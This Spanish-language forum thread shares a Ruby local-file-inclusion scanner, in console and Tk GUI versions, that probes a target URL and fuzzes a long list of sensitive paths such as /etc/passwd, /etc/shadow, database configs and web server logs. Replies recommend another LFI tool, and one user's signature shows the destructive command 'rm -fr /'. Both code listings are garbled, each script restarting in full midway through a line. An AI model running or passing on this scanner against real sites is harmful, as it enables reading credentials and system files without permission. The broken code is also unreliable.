Autor Tema: [Ruby] LFI Scanner 0.3  (Leído 4357 veces)

0 Usuarios y 1 Visitante están viendo este tema.

BigBear

  • **
  • Mensajes: 165
  • Liked: 47
[Ruby] LFI Scanner 0.3
« : agosto 21, 2015, 04:39:32 pm »
Un simple script en Ruby para scannear la vulnerabilidad LFI en una pagina.

Version consola :

Código: ruby [Seleccionar]

#!usr/bin/ruby
#LFI Scanner 0.3
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http" 

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end

def uso
print "\n[+] Sintax : ruby lfi.rb <page>\n"
end

def  head
print "\n\n-- == LFI Scanner 0.3 == --\n\n"
end

def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
exit(1)
end

def scan(web)
files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
print "\n[+] Testing the vulnerability LFI...\n\n"
code = toma(web+"'")
if code=~/No such file or directory in <b>(.*)<\/b> on line/
fpd =
#!usr/bin/ruby
#LFI Scanner 0.3
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http" 

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end

def uso
print "\n[+] Sintax : ruby lfi.rb <page>\n"
end

def  head
print "\n\n-- == LFI Scanner 0.3 == --\n\n"
end

def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
exit(1)
end

def scan(web)
files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
print "\n[+] Testing the vulnerability LFI...\n\n"
code = toma(web+"'")
if code=~/No such file or directory in <b>(.*)<\/b> on line/
fpd = $1
print "[+] LFI Detected\n\n"
print "[Full Path Discloure]: "+fpd+"\n"
print "\n[+] Fuzzing Files\n\n"
files.each do |file|
code = toma(web+file)
if not code=~/No such file or directory in/
print "[Link] : "+web+file+"\n"
end
end
print "\n[+] Finish\n"
copyright()
else
print "[-] Not Vulnerable to LFI\n\n"
end
end

#

page = ARGV[0]

head()

if !page
uso()
else
scan(page)
end

copyright()

#The End ?

print "[+] LFI Detected\n\n"
print "[Full Path Discloure]: "+fpd+"\n"
print "\n[+] Fuzzing Files\n\n"
files.each do |file|
code = toma(web+file)
if not code=~/No such file or directory in/
print "[Link] : "+web+file+"\n"
end
end
print "\n[+] Finish\n"
copyright()
else
print "[-] Not Vulnerable to LFI\n\n"
end
end

#

page = ARGV[0]

head()

if !page
uso()
else
scan(page)
end

copyright()

#The End ?


Version Tk :

Código: ruby [Seleccionar]

#!usr/bin/ruby
#LFI Scanner 0.3
#(C) Doddy Hackman 2015

require "tk"
require "net/http"
require "open-uri"

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end

#

window = TkRoot.new { title "LFI Scanner 0.3 (C) Doddy Hackman 2015" ; background "black" }
window['geometry'] = '300x300-20+10'

TkLabel.new(window) do
background "black"
foreground "cyan"
text "    Target : "
place('relx'=>"0.1",'rely'=>"0.1")
end

web= TkEntry.new(window){
background "black"
foreground "cyan"
width 25
place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
background "black"
foreground "cyan"
text "Console"
place('relx'=>0.4,'rely'=>0.2)
end

console =TkText.new(window) do
background "black"
foreground "cyan"
width 30
height 10
place('relx'=>0.1,'rely'=>0.3)
end

TkButton.new(window) do
text "Search"
    background "black"
foreground "cyan"
width 17
activebackground "cyan"
highlightbackground  "cyan"
command proc{
web = web.value.to_s
files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
console.insert("end", "[+] Testing the vulnerability LFI...\n\n")
code = toma(web+"'")
if code=~/No such file or directory in <b>(.*)<\/b> on line/
fpd =
#!usr/bin/ruby
#LFI Scanner 0.3
#(C) Doddy Hackman 2015

require "tk"
require "net/http"
require "open-uri"

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end

#

window = TkRoot.new { title "LFI Scanner 0.3 (C) Doddy Hackman 2015" ; background "black" }
window['geometry'] = '300x300-20+10'

TkLabel.new(window) do
background "black"
foreground "cyan"
text "    Target : "
place('relx'=>"0.1",'rely'=>"0.1")
end

web= TkEntry.new(window){
background "black"
foreground "cyan"
width 25
place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
background "black"
foreground "cyan"
text "Console"
place('relx'=>0.4,'rely'=>0.2)
end

console =TkText.new(window) do
background "black"
foreground "cyan"
width 30
height 10
place('relx'=>0.1,'rely'=>0.3)
end

TkButton.new(window) do
text "Search"
    background "black"
foreground "cyan"
width 17
activebackground "cyan"
highlightbackground  "cyan"
command proc{
web = web.value.to_s
files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
console.insert("end", "[+] Testing the vulnerability LFI...\n\n")
code = toma(web+"'")
if code=~/No such file or directory in <b>(.*)<\/b> on line/
fpd = $1
console.insert("end","[+] LFI Detected\n\n")
console.insert("end","[Full Path Discloure]: "+fpd+"\n")
console.insert("end","\n[+] Fuzzing Files\n\n")
files.each do |file|
code = toma(web+file)
if not code=~/No such file or directory in/
console.insert("end","[Link] : "+web+file+"\n")
end
end
console.insert("end","\n[+] Finish")
else
console.insert("end","[-] Not Vulnerable to LFI")
end
}
place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?

console.insert("end","[+] LFI Detected\n\n")
console.insert("end","[Full Path Discloure]: "+fpd+"\n")
console.insert("end","\n[+] Fuzzing Files\n\n")
files.each do |file|
code = toma(web+file)
if not code=~/No such file or directory in/
console.insert("end","[Link] : "+web+file+"\n")
end
end
console.insert("end","\n[+] Finish")
else
console.insert("end","[-] Not Vulnerable to LFI")
end
}
place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?


Una imagen :



Eso es todo.

hkm

  • Moderador
  • *
  • Mensajes: 1245
  • Liked: 292
    • Hakim.Ws
Re:[Ruby] LFI Scanner 0.3
« Respuesta #1 : agosto 22, 2015, 10:01:52 am »
Esta bueno.

Este es un LFI fuzzer bastante funcional con muchas ubicaciones de archivos para windows y linux: https://github.com/lightos/Panoptic

BigBear

  • **
  • Mensajes: 165
  • Liked: 47
Re:[Ruby] LFI Scanner 0.3
« Respuesta #2 : agosto 22, 2015, 02:57:56 pm »
gracias por comentar , me ha gustado el script del link , con esas ideas podre mejorar mi LFI Scanner en perl y subirlo a packetstormsecurity.

Saludos.

nitr0us

  • ***
  • Mensajes: 359
  • Liked: 99
  • #rm -fr /
    • http://www.brainoverflow.org
Re:[Ruby] LFI Scanner 0.3
« Respuesta #3 : agosto 24, 2015, 10:11:49 pm »
Panoptic es mi herramienta de LFI favorita, su base de datos de conocimiento es muuuuy completa y además su uso es fácil y muy flexible también.